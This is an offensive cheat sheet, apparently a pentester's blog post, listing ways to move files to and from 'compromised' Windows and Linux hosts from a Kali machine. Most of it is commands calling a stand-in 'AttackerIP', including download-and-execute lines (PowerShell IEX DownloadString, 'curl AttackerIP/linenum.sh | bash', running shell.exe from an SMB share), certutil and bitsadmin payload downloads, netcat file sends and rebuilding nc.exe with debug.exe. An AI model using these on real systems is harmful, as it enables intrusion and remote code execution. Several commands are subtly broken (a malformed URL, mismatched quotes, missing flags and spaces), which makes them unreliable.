File transfer cheat sheet for Windows and Linux operating systems.
Serving Files For Transfer
The two main methods I use for serving files over HTTP are either via Apache, or the Python SimpleHTTPServer module.
To serve a file over Apache, copy said file into /var/www/html and enable the Apache service.
Apache is installed by default in kali:
1
2
3
| root@kali:~/# cp file /var/www/html
root@kali:~/# service apache2 start
// Apache is now ready to start serving files for transfer requests.
|
My favourtie option is to start a Python webserver within my current working directory:
1
2
3
| root@kali:~/# python -m SimpleHTTPServer 80
// This will serve on port 80.
// Alternative ports can be specified.
|
Windows File Transfers
TFTP
TFTP client is installed by default on Windows machines up to Windows 2003. In Windows 7, Windows 2008, and above, this tool would have to be specifically added during installation.
1
2
3
| root@kali:~# mkdir /tftp
root@kali:~# atftpd --daemon --port 69 /tftp // atftpd is a pre-installed TFTP server in kali.
root@kali:~# cp file /tftp/
|
1
2
| // Compromised windows host
C:> tftp -i AttackerIP get file
|
FTP
It is possible to install a full-featured FTP server like vsftpd in kali. I find it far easier to use a simple FTP server using python.
The pytftpd library, similar to the HTTP one mentioned earlier, allows you to start a ftp server within your current working directory. Anonymous authentication is also accepted.
1
2
| root@kali:~# apt-get install python-pyftpdlib
root@kali:~# python -m pyftpdlib -p 21
|
With the server up and running, we can transfer files interactively or non-interactively:
1
2
3
4
5
6
7
8
| //Interactive
C:> ftp AttackerIP
Connected to AttackerIP
User: anonymous
Password: anonymous
...
ftp> binary
ftp> get shell.exe
|
1
2
3
4
5
6
7
8
| //Non-Interactive
C:> echo open AttackerIP > c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo binary >> c:\ftp.txt
C:> echo get shell.exe >> c:\ftp.txt
C:> echo bye >> c:\ftp.txt
C:> ftp -s:C:\ftp.txt
|
SMB
smbserver.py from the Impacket project can be used to launch a nice, simple SMB server on port 445.
All that’s needed is for you to specify a share name and the path to your file.
1
2
3
4
5
6
7
8
9
10
11
| root@kali:/impacket/examples# python smbserver.py transfer_share /root/shells/shell.exe
// We can then check that our SMB share is up and running from our compromised Windows host
C:> net view \\AttackerIP // Our designated share name should be visible in the output
// Windows commands like dir and copy can also be used
C:> dir \\AttackerIP\transfer_share
C:> copy \\AttackerIP\transfer_share\shell.exe
//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share
C:> \\AttackerIP\transfer_share\shell.exe
|
PowerShell
1
2
3
4
5
6
7
8
9
10
11
12
13
| // Within PowerShell
PS:> Invoke-WebRequest -Uri "http:/AttackerIP/file" -OutFile "C:\path\to\file"
// Outside PowerShell
C:> powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://AttackerIP/file")
// Non-Interactive PowerShell script
C:> echo $storageDir = $pwd > wget.ps1
C:> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:> echo $url = "http://AttackerIP/file" >>wget.ps1
C:> echo $file = "file" >>wget.ps1
C:> echo $webclient.DownloadFile($url,$file) >>wget.ps1
C:> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive NoProfile -File wget.ps1
|
OpenSSL
1
2
3
4
5
6
7
8
| // Generate keys
root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
// Serve the file on kali
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
// Execute on Windows box to transfer file to C:\file
C:\path\to\openssl.exe s_client -quiet-connect AttackerIP:1234 > C:\file
|
certutil
1
| C:> certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file
|
bitsadmin
1
| C:> bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file
|
Visual Basic Script (VBS)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| // Option 1:
// Paste each line seperately into Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
C:> cscript wget.vbs http://AttackerIP/file
// Option 2:
// Change AttackerIP && SaveToFile location
C:> echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs
C:> cscript transfer.vbs
|
debug.exe
The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. We’re able to take binaries like netcat ~ nc.exe and disassemeble them into hex.
A series of non-interactive echo commands will write out the binary file into its hex representation.
We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.
1
2
| root@kali:~# ls -l nc.exe
-rwxr-xr-x 1 root root 59392 nc.exe
|
This is close to our limit. We can use upx ~ (executable packer) to compress it further:
1
2
3
4
| root@kali:~# upx -9 nc.exe
...
root@kali:~# ls -l nc.exe
-rwxr-xr-x 1 root root 29184 nc.exe
|
The file size is now more suitable for transfer and has been decreased in size by almost 50%.
We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we’ll be using is exe2bat.exe
1
2
| root@kali:~# cp /usr/share/windows-binaries/exe2bat.exe . // Change path of exe2bat.exe to our current working directory
root@kali:~# wine exe2bat.exe nc.exe nc.txt
|
This will produce a nc.txt file we can simply copy paste into the remote windows shell, and nc.exe will be automatically created on the compromised host.
Linux File Transfers
wget
1
| wget http://AttackerIP/file -o /var/tmp/file
|
curl
1
2
3
| curl http://AttackerIP/file --output /var/tmp/file
curl AttackerIP/linenum.sh | bash
|
netcat
1
2
3
| root@kail:~# nc -nlvp 1234 < file // Start listener on kali
cat file | nc AttackerIP 1234 // Cat the file and pipe to our nc connection
|
fetch (freeBSD)
1
| fetch -o /var/tmp/file "http://AttackerIP/file"
|
Python
1
2
3
4
5
6
7
8
9
10
11
12
| vim download.py:
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://AttackerIP/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
$ chmod +x download.py // Grant executable permission
$ python download.py // Run on compromised Linux host
|
OpenSSL
Generate keys
1
| root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
Serve the file on kali
1
| root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
|
Execute on Linux host to GET the file
1
| $ openssl s_client -quiet-connect AttackerIP:1234 > file
|
socat
1
2
3
| socat TCP4-LISTEN:8000,fork file:<file to transfer> // server
socat TCP4:<ip>:8000 file:<file to get>,create // client
|
